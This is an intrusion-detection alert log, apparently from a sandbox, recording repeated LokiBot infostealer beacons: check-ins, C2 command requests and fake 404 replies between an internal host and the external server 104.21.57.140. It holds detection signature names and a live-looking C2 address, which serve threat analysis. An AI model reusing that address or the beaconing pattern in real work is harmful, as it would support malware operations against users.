2024-12-02T14:46:34.837853+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49722	104.21.57.140	80	TCP
2024-12-02T14:46:34.837853+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49722	104.21.57.140	80	TCP
2024-12-02T14:46:36.427884+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49722	104.21.57.140	80	TCP
2024-12-02T14:46:36.427884+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49722	104.21.57.140	80	TCP
2024-12-02T14:46:36.548291+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49722	TCP
2024-12-02T14:46:36.896166+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49723	104.21.57.140	80	TCP
2024-12-02T14:46:36.896166+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49723	104.21.57.140	80	TCP
2024-12-02T14:46:36.896166+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49723	104.21.57.140	80	TCP
2024-12-02T14:46:38.218158+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49723	104.21.57.140	80	TCP
2024-12-02T14:46:38.218158+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49723	104.21.57.140	80	TCP
2024-12-02T14:46:38.338335+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49723	TCP
2024-12-02T14:46:38.615373+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49730	104.21.57.140	80	TCP
2024-12-02T14:46:38.615373+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49730	104.21.57.140	80	TCP
2024-12-02T14:46:38.615373+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49730	104.21.57.140	80	TCP
2024-12-02T14:46:39.876615+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49730	104.21.57.140	80	TCP
2024-12-02T14:46:39.876615+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49730	104.21.57.140	80	TCP
2024-12-02T14:46:39.996641+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49730	TCP
2024-12-02T14:46:40.267794+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49737	104.21.57.140	80	TCP
2024-12-02T14:46:40.267794+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49737	104.21.57.140	80	TCP
2024-12-02T14:46:40.267794+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49737	104.21.57.140	80	TCP
2024-12-02T14:46:41.558318+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49737	104.21.57.140	80	TCP
2024-12-02T14:46:41.558318+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49737	104.21.57.140	80	TCP
2024-12-02T14:46:41.678314+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49737	TCP
2024-12-02T14:46:41.937967+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49745	104.21.57.140	80	TCP
2024-12-02T14:46:41.937967+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49745	104.21.57.140	80	TCP
2024-12-02T14:46:41.937967+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49745	104.21.57.140	80	TCP
2024-12-02T14:46:43.173637+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49745	104.21.57.140	80	TCP
2024-12-02T14:46:43.173637+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49745	104.21.57.140	80	TCP
2024-12-02T14:46:43.293584+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49745	TCP
2024-12-02T14:46:43.563586+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49746	104.21.57.140	80	TCP
2024-12-02T14:46:43.563586+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49746	104.21.57.140	80	TCP
2024-12-02T14:46:43.563586+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49746	104.21.57.140	80	TCP
2024-12-02T14:46:44.864180+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49746	104.21.57.140	80	TCP
2024-12-02T14:46:44.864180+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49746	104.21.57.140	80	TCP
2024-12-02T14:46:44.984213+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49746	TCP
2024-12-02T14:46:45.314614+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49752	104.21.57.140	80	TCP
2024-12-02T14:46:45.314614+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49752	104.21.57.140	80	TCP
2024-12-02T14:46:45.314614+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49752	104.21.57.140	80	TCP
2024-12-02T14:46:46.621995+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49752	104.21.57.140	80	TCP
2024-12-02T14:46:46.621995+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49752	104.21.57.140	80	TCP
2024-12-02T14:46:46.742024+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49752	TCP
2024-12-02T14:46:47.001555+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49758	104.21.57.140	80	TCP
2024-12-02T14:46:47.001555+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49758	104.21.57.140	80	TCP
2024-12-02T14:46:47.001555+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49758	104.21.57.140	80	TCP
2024-12-02T14:46:48.318545+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49758	104.21.57.140	80	TCP
2024-12-02T14:46:48.318545+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49758	104.21.57.140	80	TCP
2024-12-02T14:46:48.438705+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49758	TCP
2024-12-02T14:46:48.710341+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49764	104.21.57.140	80	TCP
2024-12-02T14:46:48.710341+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49764	104.21.57.140	80	TCP
2024-12-02T14:46:48.710341+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49764	104.21.57.140	80	TCP
2024-12-02T14:46:49.963817+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49764	104.21.57.140	80	TCP
2024-12-02T14:46:49.963817+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49764	104.21.57.140	80	TCP
2024-12-02T14:46:50.083810+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49764	TCP
2024-12-02T14:46:50.347634+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49765	104.21.57.140	80	TCP
2024-12-02T14:46:50.347634+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49765	104.21.57.140	80	TCP
2024-12-02T14:46:50.347634+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49765	104.21.57.140	80	TCP
2024-12-02T14:46:51.732546+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49765	104.21.57.140	80	TCP
2024-12-02T14:46:51.732546+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49765	104.21.57.140	80	TCP
2024-12-02T14:46:51.972164+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49765	TCP
2024-12-02T14:46:52.163009+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49771	104.21.57.140	80	TCP
2024-12-02T14:46:52.163009+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49771	104.21.57.140	80	TCP
2024-12-02T14:46:52.163009+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49771	104.21.57.140	80	TCP
2024-12-02T14:46:53.403457+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49771	104.21.57.140	80	TCP
2024-12-02T14:46:53.403457+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49771	104.21.57.140	80	TCP
2024-12-02T14:46:53.523509+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49771	TCP
2024-12-02T14:46:53.787715+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49777	104.21.57.140	80	TCP
2024-12-02T14:46:53.787715+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49777	104.21.57.140	80	TCP
2024-12-02T14:46:53.787715+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49777	104.21.57.140	80	TCP
2024-12-02T14:46:55.088990+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49777	104.21.57.140	80	TCP
2024-12-02T14:46:55.088990+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49777	104.21.57.140	80	TCP
2024-12-02T14:46:55.208979+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49777	TCP
2024-12-02T14:46:55.491152+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49781	104.21.57.140	80	TCP
2024-12-02T14:46:55.491152+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49781	104.21.57.140	80	TCP
2024-12-02T14:46:55.491152+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49781	104.21.57.140	80	TCP
2024-12-02T14:46:56.837353+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49781	104.21.57.140	80	TCP
2024-12-02T14:46:56.837353+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49781	104.21.57.140	80	TCP
2024-12-02T14:46:56.957364+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49781	TCP
2024-12-02T14:46:57.218517+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49785	104.21.57.140	80	TCP
2024-12-02T14:46:57.218517+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49785	104.21.57.140	80	TCP
2024-12-02T14:46:57.218517+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49785	104.21.57.140	80	TCP
2024-12-02T14:46:58.470919+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49785	104.21.57.140	80	TCP
2024-12-02T14:46:58.470919+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49785	104.21.57.140	80	TCP
2024-12-02T14:46:58.591098+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49785	TCP
2024-12-02T14:46:58.861315+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49790	104.21.57.140	80	TCP
2024-12-02T14:46:58.861315+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49790	104.21.57.140	80	TCP
2024-12-02T14:46:58.861315+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49790	104.21.57.140	80	TCP
2024-12-02T14:47:00.150562+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49790	104.21.57.140	80	TCP
2024-12-02T14:47:00.150562+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49790	104.21.57.140	80	TCP
2024-12-02T14:47:00.270525+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49790	TCP
2024-12-02T14:47:00.531526+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49796	104.21.57.140	80	TCP
2024-12-02T14:47:00.531526+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49796	104.21.57.140	80	TCP
2024-12-02T14:47:00.531526+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49796	104.21.57.140	80	TCP
2024-12-02T14:47:01.846835+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49796	104.21.57.140	80	TCP
2024-12-02T14:47:01.846835+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49796	104.21.57.140	80	TCP
2024-12-02T14:47:01.967778+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49796	TCP
2024-12-02T14:47:02.240374+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49800	104.21.57.140	80	TCP
2024-12-02T14:47:02.240374+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49800	104.21.57.140	80	TCP
2024-12-02T14:47:02.240374+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49800	104.21.57.140	80	TCP
2024-12-02T14:47:03.581894+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49800	104.21.57.140	80	TCP
2024-12-02T14:47:03.581894+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49800	104.21.57.140	80	TCP
2024-12-02T14:47:03.701899+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49800	TCP
2024-12-02T14:47:03.989197+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49803	104.21.57.140	80	TCP
2024-12-02T14:47:03.989197+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49803	104.21.57.140	80	TCP
2024-12-02T14:47:03.989197+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49803	104.21.57.140	80	TCP
2024-12-02T14:47:05.298971+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49803	104.21.57.140	80	TCP
2024-12-02T14:47:05.298971+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49803	104.21.57.140	80	TCP
2024-12-02T14:47:05.418962+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49803	TCP
2024-12-02T14:47:05.698802+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49809	104.21.57.140	80	TCP
2024-12-02T14:47:05.698802+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49809	104.21.57.140	80	TCP
2024-12-02T14:47:05.698802+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49809	104.21.57.140	80	TCP
2024-12-02T14:47:06.891147+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49809	104.21.57.140	80	TCP
2024-12-02T14:47:06.891147+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49809	104.21.57.140	80	TCP
2024-12-02T14:47:07.011266+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49809	TCP
2024-12-02T14:47:07.284782+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49815	104.21.57.140	80	TCP
2024-12-02T14:47:07.284782+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49815	104.21.57.140	80	TCP
2024-12-02T14:47:07.284782+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49815	104.21.57.140	80	TCP
2024-12-02T14:47:08.562385+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49815	104.21.57.140	80	TCP
2024-12-02T14:47:08.562385+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49815	104.21.57.140	80	TCP
2024-12-02T14:47:08.682468+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49815	TCP
2024-12-02T14:47:08.953661+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49818	104.21.57.140	80	TCP
2024-12-02T14:47:08.953661+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49818	104.21.57.140	80	TCP
2024-12-02T14:47:08.953661+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49818	104.21.57.140	80	TCP
2024-12-02T14:47:10.201507+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49818	104.21.57.140	80	TCP
2024-12-02T14:47:10.201507+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49818	104.21.57.140	80	TCP
2024-12-02T14:47:10.321448+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49818	TCP
2024-12-02T14:47:10.595338+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49822	104.21.57.140	80	TCP
2024-12-02T14:47:10.595338+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49822	104.21.57.140	80	TCP
2024-12-02T14:47:10.595338+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49822	104.21.57.140	80	TCP
2024-12-02T14:47:11.855158+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49822	104.21.57.140	80	TCP
2024-12-02T14:47:11.855158+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49822	104.21.57.140	80	TCP
2024-12-02T14:47:11.975279+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49822	TCP
2024-12-02T14:47:12.239800+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49828	104.21.57.140	80	TCP
2024-12-02T14:47:12.239800+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49828	104.21.57.140	80	TCP
2024-12-02T14:47:12.239800+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49828	104.21.57.140	80	TCP
2024-12-02T14:47:13.503645+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49828	104.21.57.140	80	TCP
2024-12-02T14:47:13.503645+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49828	104.21.57.140	80	TCP
2024-12-02T14:47:13.623756+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49828	TCP
2024-12-02T14:47:13.896676+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49834	104.21.57.140	80	TCP
2024-12-02T14:47:13.896676+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49834	104.21.57.140	80	TCP
2024-12-02T14:47:13.896676+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49834	104.21.57.140	80	TCP
2024-12-02T14:47:15.090673+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49834	104.21.57.140	80	TCP
2024-12-02T14:47:15.090673+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49834	104.21.57.140	80	TCP
2024-12-02T14:47:15.210858+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49834	TCP
2024-12-02T14:47:15.472435+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49836	104.21.57.140	80	TCP
2024-12-02T14:47:15.472435+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49836	104.21.57.140	80	TCP
2024-12-02T14:47:15.472435+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49836	104.21.57.140	80	TCP
2024-12-02T14:47:16.779417+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49836	104.21.57.140	80	TCP
2024-12-02T14:47:16.779417+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49836	104.21.57.140	80	TCP
2024-12-02T14:47:16.899399+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49836	TCP
2024-12-02T14:47:17.172628+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49841	104.21.57.140	80	TCP
2024-12-02T14:47:17.172628+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49841	104.21.57.140	80	TCP
2024-12-02T14:47:17.172628+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49841	104.21.57.140	80	TCP
2024-12-02T14:47:18.363637+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49841	104.21.57.140	80	TCP
2024-12-02T14:47:18.363637+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49841	104.21.57.140	80	TCP
2024-12-02T14:47:18.483637+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49841	TCP
2024-12-02T14:47:18.763775+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49847	104.21.57.140	80	TCP
2024-12-02T14:47:18.763775+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49847	104.21.57.140	80	TCP
2024-12-02T14:47:18.763775+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49847	104.21.57.140	80	TCP
2024-12-02T14:47:20.000530+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49847	104.21.57.140	80	TCP
2024-12-02T14:47:20.000530+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49847	104.21.57.140	80	TCP
2024-12-02T14:47:20.120547+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49847	TCP
2024-12-02T14:47:20.392040+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49850	104.21.57.140	80	TCP
2024-12-02T14:47:20.392040+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49850	104.21.57.140	80	TCP
2024-12-02T14:47:20.392040+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49850	104.21.57.140	80	TCP
2024-12-02T14:47:21.625855+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49850	104.21.57.140	80	TCP
2024-12-02T14:47:21.625855+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49850	104.21.57.140	80	TCP
2024-12-02T14:47:21.745852+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49850	TCP
2024-12-02T14:47:22.018417+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49854	104.21.57.140	80	TCP
2024-12-02T14:47:22.018417+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49854	104.21.57.140	80	TCP
2024-12-02T14:47:22.018417+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49854	104.21.57.140	80	TCP
2024-12-02T14:47:23.339059+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49854	104.21.57.140	80	TCP
2024-12-02T14:47:23.339059+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49854	104.21.57.140	80	TCP
2024-12-02T14:47:23.459121+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49854	TCP
2024-12-02T14:47:23.899318+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49860	104.21.57.140	80	TCP
2024-12-02T14:47:23.899318+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49860	104.21.57.140	80	TCP
2024-12-02T14:47:23.899318+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49860	104.21.57.140	80	TCP
2024-12-02T14:47:25.118771+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49860	104.21.57.140	80	TCP
2024-12-02T14:47:25.118771+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49860	104.21.57.140	80	TCP
2024-12-02T14:47:25.238973+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49860	TCP
2024-12-02T14:47:25.519040+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49867	104.21.57.140	80	TCP
2024-12-02T14:47:25.519040+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49867	104.21.57.140	80	TCP
2024-12-02T14:47:25.519040+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49867	104.21.57.140	80	TCP
2024-12-02T14:47:26.735847+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49867	104.21.57.140	80	TCP
2024-12-02T14:47:26.735847+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49867	104.21.57.140	80	TCP
2024-12-02T14:47:26.855911+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49867	TCP
2024-12-02T14:47:27.125460+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49871	104.21.57.140	80	TCP
2024-12-02T14:47:27.125460+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49871	104.21.57.140	80	TCP
2024-12-02T14:47:27.125460+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49871	104.21.57.140	80	TCP
2024-12-02T14:47:28.365300+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49871	104.21.57.140	80	TCP
2024-12-02T14:47:28.365300+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49871	104.21.57.140	80	TCP
2024-12-02T14:47:28.485526+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49871	TCP
2024-12-02T14:47:28.752703+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49875	104.21.57.140	80	TCP
2024-12-02T14:47:28.752703+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49875	104.21.57.140	80	TCP
2024-12-02T14:47:28.752703+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49875	104.21.57.140	80	TCP
2024-12-02T14:47:30.056505+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49875	104.21.57.140	80	TCP
2024-12-02T14:47:30.056505+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49875	104.21.57.140	80	TCP
2024-12-02T14:47:30.176498+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49875	TCP
2024-12-02T14:47:30.441791+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49882	104.21.57.140	80	TCP
2024-12-02T14:47:30.441791+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49882	104.21.57.140	80	TCP
2024-12-02T14:47:30.441791+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49882	104.21.57.140	80	TCP
2024-12-02T14:47:31.751031+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49882	104.21.57.140	80	TCP
2024-12-02T14:47:31.751031+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49882	104.21.57.140	80	TCP
2024-12-02T14:47:31.871182+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.57.140	80	192.168.2.7	49882	TCP
